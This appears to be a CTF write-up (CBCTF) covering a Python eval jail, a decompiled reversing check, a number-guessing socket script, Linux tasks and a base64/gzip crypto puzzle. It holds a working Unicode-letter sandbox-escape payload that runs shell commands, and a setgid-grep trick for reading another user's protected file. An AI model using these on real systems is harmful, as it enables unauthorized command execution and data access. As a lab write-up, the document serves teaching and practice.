20
21
22
23
24
25
26
27
from string import ascii_letters


WELCOME = '''
_ _______ _______ _ __
| | | ____\ \ / / ____| | / /_
| | | _| \ \ / /| _| | | | '_ \
| |___| |___ \ V / | |___| |___ | (_) |
|_____|_____| \_/ |_____|_____| \___/

'''

print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("I'm just a calculator, hhhhhh.\nYou can not use any letters!")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if any([i in ascii_letters for i in input_data]):
print("Ohhhh, what are you doing???!!!")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
> __𝑖𝑚𝑝𝑜𝑟𝑡__('\157\163').𝑝𝑜𝑝𝑒𝑛('\145\156\166').𝑟𝑒𝑎𝑑()
Result: KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.43.0.1:443
REMOTE_HOST=100.64.0.4
HOSTNAME=pod-0af3eb6e4f0e875378b7
HOME=/root
LC_CTYPE=C.UTF-8
KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/
FLAG=CBCTF{l-ForgEt_ThE_UNlcODE_l3TT3EEERS}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
int sub_4011C0()
{
int v0; // eax
int v1; // eax
unsigned int v3; // eax
int v4; // eax
int v5; // eax
unsigned int v6; // [esp+14h] [ebp-114h]
unsigned int v7; // [esp+18h] [ebp-110h] BYREF
unsigned int i; // [esp+1Ch] [ebp-10Ch]
LPVOID lpMem; // [esp+20h] [ebp-108h]
_BYTE v10[256]; // [esp+24h] [ebp-104h] BYREF

sub_401440(aEnterInput);
v0 = sub_4059A8(0);
if ( sub_405B85(v10, 256, v0) )
{
v6 = sub_4079B0(v10, asc_41E01C);
if ( v6 >= 0x100 )
sub_40159D();
v10[v6] = 0;
v7 = 0;
v3 = sub_407A00(v10);
lpMem = (LPVOID)sub_401000((int)v10, v3, &v7);
if ( lpMem )
{
for ( i = 0; i < v7; ++i )
*((_BYTE *)lpMem + i) ^= 0x16u;
v5 = sub_407A00(aFuxnfbQxrXeFLq);
if ( v7 != v5 || sub_4021DB(lpMem, aFuxnfbQxrXeFLq, v7) )
{
sub_401440(aFail);
sub_401440(a99s);
}
else
{
sub_401440(aSuccess);
}
sub_407990(lpMem);
return 0;
}
else
{
v4 = sub_4059A8(2);
sub_401400(v4, aMemoryError);
return 1;
}
}
else
{
v1 = sub_4059A8(2);
sub_401400(v1, aReadError);
return 1;
}
}

Linux

  • GuessWhat

来和猜猜超~大~的数字吧

打开容器,巨大无比的数字,问ai发现是2^1024-1

二分法吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import socket
import time

host = "101.37.152.107"
port = 51899

s = socket.socket()
s.connect((host, port))
s.settimeout(5)
print("欢迎信息:", s.recv(4096).decode().strip())

low=1
high=179769313486231590772930519078902473361797697894230657273430081157732675805500963132708477322407536021120113879871393357658789768814416622492847430639474124377767893424865485276302219601246094119453082952085005768838150682342462881473913110540827237163350510684586298239947245938479716304835356329624224137215

prompt_bytes = "输入一个数字:".encode('utf-8')

for i in range(1024):
mid = (low + high) // 2
print(f"\n尝试 {i}: {mid}")

# 发送猜测
guess_str = str(mid) + "\n"
s.send(guess_str.encode())

# 尝试读取,允许重试
max_retries = 3
resp_text = ""
for retry in range(max_retries):
resp = b""
try:
chunk = s.recv(4096)
time.sleep(0.2) # 等待更长时间
while chunk:
resp += chunk
if prompt_bytes in resp:
break
try:
chunk = s.recv(4096)
except socket.timeout:
break
except socket.timeout:
print(f" 读取超时 (重试 {retry+1}/{max_retries})")
continue

resp_text = resp.decode('utf-8', errors='ignore')
print(f" 原始响应: {repr(resp_text)}")

# 如果响应包含大小提示,就跳出重试循环
if "猜得太" in resp_text or "flag" in resp_text.lower() or "正确" in resp_text or "恭喜" in resp_text:
break
elif retry < max_retries - 1:
# 没收到有效响应,重新发送相同的猜测
print(f" 未收到大小提示,重新发送...")
s.send(guess_str.encode())
time.sleep(0.3)

# 处理响应
if "猜得太小了" in resp_text:
low = mid + 1
print("-> 太小")
elif "猜得太大了" in resp_text:
high = mid - 1
print("-> 太大")
elif "flag" in resp_text.lower() or "正确" in resp_text or "恭喜" in resp_text or "成功" in resp_text:
print("成功!答案可能是:", mid)
print("完整响应:", resp_text)
break
elif "格式有误" in resp_text:
print("格式错误,停止")
break
elif "输入一个数字:" in resp_text and ("猜得太" not in resp_text):
# 只有提示,没有大小判断
print("没有大小判断,可能游戏结束或连接异常")
# 尝试继续,但可能无效
continue
else:
print("未知响应,继续尝试...")
time.sleep(0.5)

print("\n最终范围:", low, "到", high)
s.close()
1
2
3
4
5
6
7
尝试 1022: 97840730776542341231693997877036791705381503372002052240864442189704334444583757102752029803417588499983466888360411211033468663597999986423581319971031300244738035685925678531286296576852108117779042109204420792505995413370369016448014261587879061078527642363379087098954032685672485058950496553457395585806
原始响应: '猜对啦!\nflag=CBCTF{PwntOOOo0l5-I5_SUcH-a_PoWERFUl_to0l}\n\n'
成功!答案可能是: 97840730776542341231693997877036791705381503372002052240864442189704334444583757102752029803417588499983466888360411211033468663597999986423581319971031300244738035685925678531286296576852108117779042109204420792505995413370369016448014261587879061078527642363379087098954032685672485058950496553457395585806
完整响应: 猜对啦!
flag=CBCTF{PwntOOOo0l5-I5_SUcH-a_PoWERFUl_to0l}

最终范围: 97840730776542341231693997877036791705381503372002052240864442189704334444583757102752029803417588499983466888360411211033468663597999986423581319971031300244738035685925678531286296576852108117779042109204420792505995413370369016448014261587879061078527642363379087098954032685672485058950496553457395585805 到 97840730776542341231693997877036791705381503372002052240864442189704334444583757102752029803417588499983466888360411211033468663597999986423581319971031300244738035685925678531286296576852108117779042109204420792505995413370369016448014261587879061078527642363379087098954032685672485058950496553457395585807

CBCTF{PwntOOOo0l5-I5_SUcH-a_PoWERFUl_to0l}

  • I use Debian btw

恭喜你拿到了一台debian机器的shell!请你做一些信息收集,然后完善一下基础设施吧~

使用telnet连接端口哦

连接一下,ai提示说一般有checkme程序

拿到一台机器,首先要检查一下系统信息,这台机器的发行版完整名字是(PRETTY_NAME)?

1
2
ctf@pod-2a9e39db8abecac116e2:~$ cat /etc/os-release | grep PRETTY_NAME
PRETTY_NAME="Debian GNU/Linux 13 (trixie)"

ctf用户的权限是多少(UID)?

1
2
ctf@pod-2a9e39db8abecac116e2:~$ id ctf
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)

接下来我来看看有没有下列工具 [x] 未找到 ps [x] 未找到 file [x] 未找到 libelf [!] 有 3 个文件未找到,请先通过apt安装他们

1
2
3
4
sudo apt update
sudo apt install -y procps
sudo apt install -y file
sudo apt install -y elfutils libelf-dev

用户Jackson的家目录下有一个signature文件,请你读取其中的内容告诉我

直接读取权限不够,需要用一些手段

1
2
3
4
5
ctf@pod-2a9e39db8abecac116e2:~$ find / -type f -perm -2000 2>/dev/null
/usr/sbin/unix_chkpwd
/usr/bin/grep
/usr/bin/chage
/usr/bin/expiry

尝试发现

1
2
3
4
ctf@pod-2a9e39db8abecac116e2:~$ ls -la /usr/bin/grep
-rwxr-sr-x 1 root Jackson 203152 Jan 4 2024 /usr/bin/grep
ctf@pod-2a9e39db8abecac116e2:~$ ls -la /usr/bin/grep | awk '{print $4}'
Jackson

/usr/bin/grep 是setgid到Jackson组的!这意味着当我们运行grep时,它会以Jackson组的权限运行,而Jackson组有读取signature文件的权限。

于是

1
2
ctf@pod-2a9e39db8abecac116e2:~$ /usr/bin/grep . /home/Jackson/signature
db9ef65a-7e7b-4db2-af77-739ae0407f53

你知道git吗?lazygit是一个TUI前端,可以方便git操作,请你帮我取来0.54.2版本,并告诉我文件的路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 使用apt安装必要的工具
sudo apt update
sudo apt install -y wget

# 如果wget安装失败,尝试curl
sudo apt install -y curl

# 下载lazygit 0.54.2
wget https://github.com/jesseduffield/lazygit/releases/download/v0.54.2/lazygit_0.54.2_Linux_x86_64.tar.gz

# 解压
tar -xzf lazygit_0.54.2_Linux_x86_64.tar.gz

# 查看文件路径
pwd
ls -la
1
2
3
4
5
6
7
8
9
10
11
12
13
14
ctf@pod-2a9e39db8abecac116e2:~$ ls -la
total 29192
drwx------ 1 ctf ctf 4096 Dec 19 02:11 .
drwxr-xr-x 1 root root 4096 Aug 26 18:13 ..
-rw-r--r-- 1 ctf ctf 67 Aug 25 08:23 .bash_history
-rw-r--r-- 1 ctf ctf 220 Jul 30 19:28 .bash_logout
-rw-r--r-- 1 ctf ctf 3606 Dec 19 01:59 .bashrc
-rw-r--r-- 1 ctf ctf 807 Jul 30 19:28 .profile
-rw-rw-r-- 1 ctf ctf 165 Dec 19 02:11 .wget-hsts
-rw-r--r-- 1 ctf ctf 1071 Aug 11 16:22 LICENSE
-rw-r--r-- 1 ctf ctf 31910 Aug 11 16:22 README.md
-rw-r--r-- 1 root root 64 Aug 25 08:23 hint
-rwxr-xr-x 1 ctf ctf 21901496 Aug 11 16:27 lazygit
-rw-rw-r-- 1 ctf ctf 7906869 Aug 11 16:28 lazygit_0.54.2_Linux_x86_64.tar.gz

最后从lazygit中提取出编译的build id信息吧(GNU的)

1
2
sudo apt install -y binutils
/home/ctf/lazygit | grep -i build
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
拿到一台机器,首先要检查一下系统信息,这台机器的发行版完整名字是(PRETTY_NAME)?
Debian GNU/Linux 13 (trixie)
[-] 通过
ctf用户的权限是多少(UID)?
1000
[-] 通过
接下来我来看看有没有下列工具
[+] 已找到 ps
[+] 已找到 file
[+] 已找到 libelf
[-] 已找到所有文件
用户Jackson的家目录下有一个signature文件,请你读取其中的内容告诉我
db9ef65a-7e7b-4db2-af77-739ae0407f53
[-] 通过
你知道git吗?lazygit是一个TUI前端,可以方便git操作,请你帮我取来0.54.2版本,并告诉我文件的路径
/home/ctf/lazygit
[-] 通过
最后从lazygit中提取出编译的build id信息吧(GNU的)
c2d913ebc9b342bfa601bb4296492a46706d0769
[-] 通过
恭喜你成功通过了所有测试!flag是:CBCTF{wOw-U-r_LIiiNUx-M@ST3R}

CBCTF{wOw-U-r_LIiiNUx-M@ST3R}

  • 三剑客

Linux有三剑客,你知道怎么使用吗?

使用telnet连接端口哦

第一关:TASK 1 请输入一条命令,将标准输入中的所有x字符删除,并在第10行后插入一行

1
sed -e 's/x//g' -e '10a checkme'

第二关:TASK 2 请输入一条命令,给标准输入中的每一行加一个行号,类似1 …

1
awk '{print NR, $0}'

第三关:TASK 3 请输入一条命令,从标准输入中取出所有形如13190011239这样的电话号码

1
grep -oE "1[0-9]{10}"

CBCTF{25a972b3-8493-498c-ae21-ceac3e70e77b}

Crypto

  • Wilderness

Had I not seen the… I’d almost swear this text was Base64. But something feels off—it’s as if it’s been… compressed somehow ?

若不是看到了·-··-· 我差点就以为这段文本是 Base64 编码。但总觉得哪里不对劲 —— 仿佛它被·-··-·压缩过?

1
H4sIAAAAAAACE81bW24bRxC8yuYrP0FQfYwAuYRi0zZhmgJMGUZuH0kkd7oes6TsBAhixLQ0OzuP7urq6uYfT8vh8fHzaTnsP++Wp0/70/L852H5uns4HP5+/t3x43L89uWv3dfflofDl8fTy/jn/+2Pz4N3y/f94f3u63F3Oi2PH5b3D08Pvy9/7p5+PS2nT/vj7nmiw/7jp6fl8bjsn5aH4/vltNst+w/L993y7uG4fNg//+jh+Pfy7vBtd/plQb3+h+cPr3+fP7z8bMHrv88/oTF1/lCXDza4zXMZ/DJIxpx/8jpP3Zqwvb10nvHUurDrzL6w85i8DNAr+k5hE74sqc+DzXkuHwrThb0Oopfq4PNOz4ML6zIAPY3xLv5VtYu7jvFlvD4Vl1EIJw9a4XpN0VrqOljmmS4s7UJNVGysv11u2Z663/yC2bTtrHuX+wpXYLdMZ4j0eH4XStyqwpb95IG5U99yfDre6UFVqW2sTnTbc4dhu0F2LzB/p51Gaxm+PD3w/PjkV/cdnWEC0jIIUl4/9g9nz7uATDnIXPDnstR1zHlUXwaujoZmqwNkik71/PE8c9EN9scvSAu0FcLWjL4erF6wznwdjA4Fl72vY65bXmemfY3z0XnWNUPnqWF1hbZlrFaHBoN2YnW5uFJ85nmuby/CZ7THLzbfb4etZZwhGj5vzUNoMyxhRYlq+7qeanuXOEgNZFsNcr2LcQhsh+ve0Q6zyPjJxq62gZk9N+hud6F+UaB5xrvWMXXbd8bjq7GtIWC1jVI0pnn0UjZ8sGasKe29cPOcx3Vj9bjVDqdnWHKGFDjMdwTVe4RdDbLG3mVfHQFqdhftXeI74wy31qP3/p9hJvpOa+ZfAjIRV0si/hoCyA4L8d6DbYyfQOZp67nG5e4yvPdmCWV7n/ngwHD3nUZlhY/NznDFOiLbMA7Qj6U4NnXMFFz1fd1jz+mczZ7TORef8xttNWKmrhmQd/XHOWRH/5rZWEk0H/Z8XfMWhvfYZMxcyECLyz4PWqKx8gSm1tk22J4b8UhrRl5zZzLsej8YvyoQIeM2pd7NfAwz/0ocyc4ZdeddDPSrQI3GzDDbqP/RmjtmTmOK4bPHyoAt6ju3fNABVi4XTt400E/8FDF+wQ78bltlDP8X/aJgiseNe88coCK29JhyE3sbf/45LvHDWBdi3NjXD/DncD5Vs7uomvCNtuZ2yzl2Z55ZZIcST8u0OPNTzta7Pc/O0OcZaU7E1duY0Iy/7uWr9+TUQ5yZ42HPd5z7eex2OyzlP2rG/d5HYhjepWNmdzHH3pQXUASZ8Xm5r2E/W3jYVSOJKV2zGkaCGC8ATHPYmBOprRbe7Bcw9bsZgJ9zx5bZGXZ73shBWJdop3E7XlhONMlz60ZuXukGy7B3AzMtDvor6pb9gPOUe3Lqyd6Tf/neQ54SfDnGOA6jnsfBeQuSBitaE2YcCZN8xzh2xLENfii8hXQ2THBsO/9K8VTX/DaMck7C72p5yjSXyVxL852eU9/kxqgJz+z3xfWvrdi99S4k/PEcf86jClO+Yeinb9/gYwkPUy0gc+yN+2p0hdZ8N/bOeaafc1jPVGuKecE0Z7TY9PO6hPhp0CW67ue8Tuwn62NvwIStmKJcovCG9QS9dxN/RAFOe3duc5MfUt4007pNZ2sK5ybW5TH3xsqQmxdSJSJwpKDPN7/gnPriGKlqxkmfnFiXVbVunhRgqVuVxtxW5IKqT6Wc1iVT9LAOyvUIE1yWl3aC0gnNu9cx5KeKbNb50Cs+mkn1y9WEt1r9SwNHCUMbNr+KBhWaK0hvAbUKiBxh6nevrLmkrP0JfYPK8K0o0AwyOIjqJKmIzOccynnov7KjE03G4aJcBe0GoGDFRfaEtJdlgIUO05rApUMqQSqpALOU3phU0PaYVoKECbaVyYl5bnkpIeBG86aQCkEtQSUCt94VxzwV6siPOKYoi4ypK6GfdtfYgXPpmY2/AxpJQ1Ilh9Y96Qapuo1J7C63lhJ/FwQg4wccSaBqoZbPuvErOTFP4QIEqQewPplm4eU549BFrZY9pLyZ9JEYY5WlFYE/A9q6YCoEiDAE7+4pp1BZWoaoB5RbaRFHEkPuOpOOjuHLNQl/LDvnrg9AIizKiy8jba8WC/jtXXCD7qJYZkH5sSAJmyLYWl6Q2gX1cQOZXt0OfQWW0LXAWqlNFJ0fClDTUh0hQ9Wjt4hMYorXNAuaeljDlXFIyXzd5oPkzqxSwEoPgU8+q0YeZRop1bI7qB9ALVwkwaKkDxHwyeZZySGO5K0CTAa4L4WvgIiHInZzc1hl1rNjT9acyYieWeJE6BKcMHMo10KQ6QouoRRidQAV+yGFKKLMDksb0lzG1A7b3iBXzrXKXmENTsw8ySBrcu+eJZEwJdfdeK8pVDDBRPsTOm028yup0VOnHEyqosGYNJZ4SMq5lfN5eNuzdsrxNWHST6tdQ+jwbh1lKC0LBhFepfIUrewMS6Cgl3Wk05JIoKw5XaV1RLe+HVczJHNxLcVbbfveyykov51y87IakHEAzraAVN8RkTD5ly6ejreUVQZCPu8AnGALnEyG4ri6MHdwucLgLEXqsFY+s31VkBEqJJgizhiFIAYCzf4sh503U7mIAbVnSl1DSqUxrgIBjuIM9wAH9amSFocYFPQM4cXEIOVJPwAVHCX39K9dBF3CqgP+dQnPC1JWAhdj8+Oc2YkLE+3heUpyWO7itv5VaA0xqD1VOS8oy4WN5OSLk9SVtkwBGhTIAnyVNmZLc5cyYfQ1K5widtSbYGKqLAM1EXuUiCEIcijvgnyQCSdHokk7k1FHL5r4Fx9YUJL8vXO/SpcyS6URQ4CnZqVpqVBZIa4qVbkumjQ0C3+KY1IDigkLI7Z+La6cCAX9mb8ehS51wtUVU6QDLbQ6NfR83JCYrlD9veTLWfYVD0qcFWmbIm03WJYOwPICPUzXiIhLwMKNNl3D+1IqsndyT/2yWIXeXcCbhVRHev78D+8bZUgyOwAA

base64+Gunzip

1
It looks like this is a really long number, almost lost in the wilderness of data. Let's shine a light on it and see if we can find any clues! 01010100 01101000 01100101 00100000 01110100 01101001 01101101 01100101 00100000 01101000 01100001 01110011 00100000 01100011 01101111 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100001 01101011 01100101 00100000 01100001 00100000 01100011 01101000 01101111 01101001 01100011 01100101 00101110 00100000 01000011 01101000 01101111 01101111 01110011 01100101 00100000 01110111 01101001 01110011 01100101 01101100 01111001 00101100 00100000 01101111 01110010 00100000 01111001 01101111 01110101 00100000 01110010 01101001 01110011 01101011 00100000 01101100 01100101 01110100 01110100 01101001 01101110 01100111 00100000 01111001 01101111 01110101 01110010 00100000 01101000 01100101 01100001 01110010 01110100 00100000 01100010 01100101 01100011 01101111 01101101 01100101 00100000 01100001 00100000 01101110 01100101 01110111 01100101 01110010 00100000 01110111 01101001 01101100 01100100 01100101 01110010 01101110 01100101 01110011 01110011 00101100 00100000 01100001 01101110 01100100 00100000 01110100 01101000 01100101 00100000 01110100 01110010 01110101 01100101 00100000 01100110 01101100 01100001 01100111 00100000 01101101 01100001 01111001 00100000 01110010 01100101 01101101 01100001 01101001 01101110 00100000 01101000 01101001 01100100 01100100 01100101 01101110 00100000 01101001 01101110 00100000 01110100 01101000 01100101 00100000 01110011 01101000 01100001 01100100 01100101 00101110 00001010 00001010 01010110 01000111 01101000 01101100 01001001 01000111 01011010 01110011 01011001 01010111 01100011 01100111 01100001 01011000 01001101 01100111 01010111 01101011 01000110 01000100 01010110 01000101 01011010 00110111 01001101 01010110 00111001 01101010 01001101 01001000 01010110 01110011 01011010 01000110 00111001 01101111 01010001 01001000 01011001 01111010 01011000 00110010 01001001 01110111 01100011 01101101 00110101 01101100 01011000 00110011 01010010 01101111 01001101 00110001 00111001 01010100 01100001 01000101 01000010 01101011 01001101 00110001 00111000 01110111 01011010 01101100 00111001 01110100 01010001 01000100 01100100 01101111 01100110 01010100 01010101 00110100 01001001 01010011 01000010 01001011 01100100 01011000 01001110 00110000 01001001 01000111 01000101 01100111 01100010 01000111 01101100 00110000 01100100 01000111 01111000 01101100 01001001 01000111 01110000 01110110 01100001 00110010 01010101 01110011 01001001 01000101 00110001 00110011 01011001 01010111 01101000 01101000 01100001 01000111 01000101 01101000 01001001 01010011 01000010 01011010 01100010 00110011 01010101 01100111 01100010 01010111 01101100 01101110 01100001 01001000 01010001 01100111 01100010 01101101 00111001 00110000 01100001 01010111 01001110 01101100 01001001 01001000 01010010 01101111 01011001 01011000 01010001 01100111 01100100 01000111 01101000 01101100 01001001 01000111 01011010 01110011 01011001 01010111 01100011 01100111 01011001 00110010 00111001 01110100 01011010 01011000 01001101 01100111 01011010 01101110 01001010 01110110 01100010 01010011 01000010 01101000 01001001 01001000 01000010 01110110 01011010 01010111 00110000 01100111 01011001 01101110 01101011 01100111 01010010 01000111 01101100 01101010 01100001 00110010 01101100 01110101 01100011 00110010 00111001 01110101 01001100 01000011 01000001 01101001 01010011 01000111 01000110 01101011 01001001 01000101 01101011 01100111 01100010 01101101 00111001 00110000 01001001 01001000 01001110 01101100 01011010 01010111 00110100 01100111 01100100 01000111 01101000 01101100 01001001 01001000 01001110 00110001 01100010 01101001 00110100 01101001 01001001 01000110 01010010 01101111 01011010 01010011 01000010 01110101 01011010 01011000 01101000 00110000 01001001 01000111 01111000 01110000 01100010 01101101 01010110 01111010 01001001 01000111 01100100 01110110 01001111 01101001 01000001 01101001 01010001 01101110 01010110 00110000 01001001 01000101 01111000 01110000 01011010 00110010 01101000 00110000 01001001 01000111 01000101 01100111 01100010 01101101 01010110 00110011 01011010 01011000 01001001 01100111 01010110 00110010 01101100 01110011 01011010 01000111 01010110 01111001 01100010 01101101 01010110 01111010 01100011 01111001 01110111 01100111 01010100 01011000 01101011 01100111 01010110 00110010 01101100 01110011 01011010 01000111 01010110 01111001 01100010 01101101 01010110 01111010 01100011 01111001 01000010 01101111 01011001 01011000 01001101 01100111 01100010 01010111 01000110 01101011 01011010 01010011 00110100 01101001 01001001 01000101 01101110 01101001 01100111 01001010 01101100 00110010 01011010 01010011 01000010 01110100 01011001 01010111 01010010 01101100 01001001 01000111 01000101 01100111 01100011 00110010 01111000 01110000 01011010 00110010 01101000 00110000 01001001 01000111 01000110 01110011 01100100 01000111 01010110 01111001 01011001 01011000 01010010 01110000 01100010 00110010 00110100 01100111 01100100 01000111 00111000 01100111 01100100 01000111 01101000 01101100 01001001 01000111 01111000 01110000 01100010 01101101 01010110 01111010 01001100 01000011 01000010 01110001 01100100 01011000 01001110 00110000 01001001 01001000 01010010 01110110 01001001 01000111 01001110 01110110 01100010 01101101 01011010 00110001 01100011 00110010 01010101 01100111 01100101 01010111 00111001 00110001 01100011 01101001 01000010 01101100 01100101 01010111 01010110 01111010 01001100 01101001 01000010 01010001 01011010 01011000 01001010 01101111 01011001 01011000 01000010 01111010 01001001 01001000 01010010 01101111 01100001 01011000 01001101 01100111 01100100 00110010 01101100 01110011 01100010 01000011 01000010 01101111 01011010 01010111 01111000 01110111 01001001 01001000 01101100 01110110 01100100 01010011 01000010 01101110 01100100 01010111 01010110 01111010 01100011 01111001 01000010 00110000 01100001 01000111 01010101 01100111 01100100 01001000 01001010 00110001 01011010 01010011 01000010 01101101 01100010 01000111 01000110 01101110 01010000 01111001 01000010 01000011 01100100 01011000 01010001 01100111 01100001 01010111 01011001 01100111 01100101 01010111 00111001 00110001 00110100 01101111 01000011 01011010 01100011 01101101 01010101 01100111 01100100 01011000 01000001 01100111 01011010 01101101 00111001 01111001 01001001 01000111 01000101 01100111 01011001 00110010 01101000 01101000 01100010 01000111 01111000 01101100 01100010 01101101 01100100 01101100 01001100 01000011 01000010 01110100 01011001 01011000 01101100 01101001 01011010 01010011 01000010 00110101 01100010 00110011 01010101 01100111 01100011 00110010 01101000 01110110 01100100 01010111 01111000 01101011 01001001 01000111 01111000 01110110 01100010 00110010 01110011 01100111 01011001 01101101 01000110 01101010 01100001 01111001 01000010 01101010 01011001 01011000 01001010 01101100 01011010 01101110 01010110 01110011 01100010 01001000 01101011 01100111 01011001 01010111 00110101 01101011 01001001 01001000 01001110 01101100 01011010 01010011 01000010 01110000 01011010 01101001 01000010 00110000 01100001 01000111 01010110 01111001 01011010 01010011 01100100 01111010 01001001 01000111 01000101 01100111 01100001 01000111 01101100 01101011 01011010 01000111 01010110 01110101 01001001 01000101 01001010 01101000 01100011 00110010 01010101 01100111 01011010 01000111 01010110 01101010 01100011 01101110 01101100 01110111 01100100 01000111 01101100 01110110 01100010 01101001 00110100 01100111 01010110 01000111 01101000 01101100 01100011 01101101 01011000 01101001 01100111 01001010 01101100 01111010 01001001 01000111 00110001 01110110 01100011 01101101 01010101 01100111 01100100 01000111 00111000 01100111 01011010 01000111 01101100 01111010 01011001 00110010 00111001 00110010 01011010 01011000 01001001 01100111 01100001 01010111 00110100 01100111 01100100 01000111 01101000 01101100 01001001 01000111 00110101 00110001 01100010 01010111 01001010 01101100 01100011 01101110 01001101 01100111 01011001 01010111 00110101 01101011 01001001 01000111 01111000 01101100 01100100 01001000 01010010 01101100 01100011 01101110 01001101 01110011 01001001 01001000 01001110 01101100 01011001 00110011 01001010 01101100 01100100 01001000 01001101 01100111 01100100 00110010 01000110 01110000 01100100 01000111 01101100 01110101 01011010 01111001 01000010 00110000 01100010 01111001 01000010 01101001 01011010 01010011 01000010 00110001 01100010 01101110 01011010 01101100 01100001 01010111 01111000 01101100 01011010 01000011 00110100 00111101 00001010 00001010 00110010 00110110 01000110 01101010 01110100 01101111 01111010 01110011 01011010 00110111 01010010 00110010 01000101 01010001 01000001 01110111 01010101 01010010 01000111 01011000 01110100 01110001 01011010 01000100 01101110 01100011 01100101 00110111 01011000 01010111 00110100 00110111 00110101 00110111 00110001 01101001 01100011 01010100 01010010 01010001 01001110 01011000 01110000 01101011 01010011 01010110 01101110 01110100 01001101 01101000 00111000 01000011 01101010 01101011 00110101 01110000 01110000 01001000 01000010 01010100 01100101 01001100 01000110 01100111 00110001 01001100 01010001 01101001 01010111 01110100 00111001 01011010 01010000 01110000 01010000 01110100 01101011 01010100 01110001 00111000 01100100 01110000 01110100 01001110 01111000 01100100 00110010 01011001 01010001 01100101 00110110 01011001 00110101 01100001 00110101 01101011 01010000 00111000 01110001 01010111 01010001 01100110 01001100 00111000 01000111 01010001 01001010 01010100 01101101 01101001 01110100 01010100 01000101 01111001 01101010 01100011 01110010 00110010 01100011 01000001 01110010 00110110 01001000 01010101 01111001 01001000 01010111 01110110 01111010 01000011 01101010 01100011 00111000 01100010 01001101 01100110 00111000 01100010 01111001 01100110 01101110 01010000 00110010 00110001 01101111 01100111 01010001 01111001 01010101 00110001 01010001 01000010 01110110 00110010 01001000 01000101 00110010 01010100 00111001 01010011 00110101 01101011 01110001 01100110 01011010 01101011 01101010 01101010 01001110 01000100 01001101 01100001 01011001 01000010 01010011 00110110 01010111 01001010 01010001 01100101 01000111 01100111 01000110 00110100 01110010 00111000 01010010 00110011 01011000 00110111 01100010 01001110 00110111 01100100 01001000 01100111 01011010 01001101 01000111 01000001 00110100 01100100 01101101 00110111 01100101 01010000 01110101 00111000 01110001 01100010 00110111 00111000 01001101 01000101 00111001 01101001 01000011 01100100 01110011 01100010 01110011 01101010 00111001 01100011 01110111 01100101 00110111 01101000 00110001 01001000 01011001 01000001 01011010 00110110 00110011 01001000 01111001 01001101 01110111 01111010 01010101 01100010 01110100 01000001 01010101 00111001 01100100 01100101 01010110 01010010 01111010 01000111 01110111 01101001 01110101 01010110 01000011 00111000 01011010 01110111 01000101 01101010 01101010 01100101 01110001 01010100 01101000 00111001 01000100 01101101 01000111 01110100 01010111 01110101 01101110 01101000 01001011 00111000 01110001 01010101 00110100 01101010 01000111 00110111 01101000 01100100 01011010 01001000 01100011 01010000 01110101 01000010 01110001 01001010 00110011 01110001 01101001 01000100 01000011 00111001 01100010 00110011 01110010 00110110 01101010 01111001 01101110 01001110 01001011 01101000 00110111 01000011 01111000 01001000 01100111 01010001 01011010 00110100 01001010 01010100 01100110 01011010 01010101 00110101 01000101 01101001 00110111 01110010 01011000 01101010 01001010 01110010 01010001 01101111 00111000 01100110 01001000 01010011 01010001 01100100 01000001 01101110 01010010 01001000 01110101 01110111 01000001 00111000 01010110 01100100 01011001 01001010 01101010 01011000 01000010 01010000 01100110 01101101 01110100 00110100 01100011 01010101 01111010 01010010 01110100 01010100 01110100 01001101 01001101 01100110 01001110 01100011 01010111 01110000 01110011 01010100 00110110 01101110 01010101 00110101 01111010 01110011 01101011 01011000 01101010 01010000 01010110 01110101 01000101 01010101 01101001 01000110 01110000 01010101 00110101 01001101 01111000 01000101 01000001 01010110 01101001 01111000 00110101 01001100 01000010 01110011 01100011 00110111 01011000 01110000 01010000 01010100 01101001 01110100 01010101 01001101 01100100 01110101 01100101 00110100 01011010 00110101 01010001 00110011 01010101 01100100 01010111 01011001 00110100 01001100 01010101 01100010 01110000 01000101 01001100 01100110 01111010 01100110 00111001 01001000 01000110 00110101 01000110 01110000 01010000 01110111 01100011 01000100 01100100 01000101 01010001 01110011 01001010 01110011 01101000 01111001 00110110 00111001 01010010 01110111 01110101 01010011 01010000 01111000 01111001 01001110 01111000 01000111 01011001 01100101 01110110 01110100 00110110 01101010 01110011 01111010 01100111 00110100 01110001 01010001 01000011 01010011 01000010 01011000 01100011 01010101 01000100 01001000 01110010 00110100 01101000 01101010 01100001 00110011 01011000 01010110 01111010 01000110 01001100 01100010 01000011 01110100 01110001 01101110 01011000 01111000 00111000 01110010 01110011 01001110 01101000 01101101 01000100 01100011 01110101 01101011 01011000 01001110 00110001 01110000 01101011 01000101 01000110 01000111 01010011 01010001 01111000 01110010 01010101 01000011 01100101 00110100 00110111 01010100 01100010 00110111 01010011 01101001 01011010 00110100 01001101 01001000 00111000 01100100 01101111 01001010 01010011 01000111 01001110 01000011 01011001 01100110 01110010 01110100 00110100 01001110 01110011 01101110 01110111 01100101 01100011 01100100 01100101 01010000 01110010 01001101 01110001 01100011 01100100 00110110 01010100 01111001 01010100 01001011 01110001 01110101 00110010 00110011 01010001 01010111 01001000 01101001 01010000 01110000 01010111 01100010 01110100 01110011 00110101 01001000 01010011 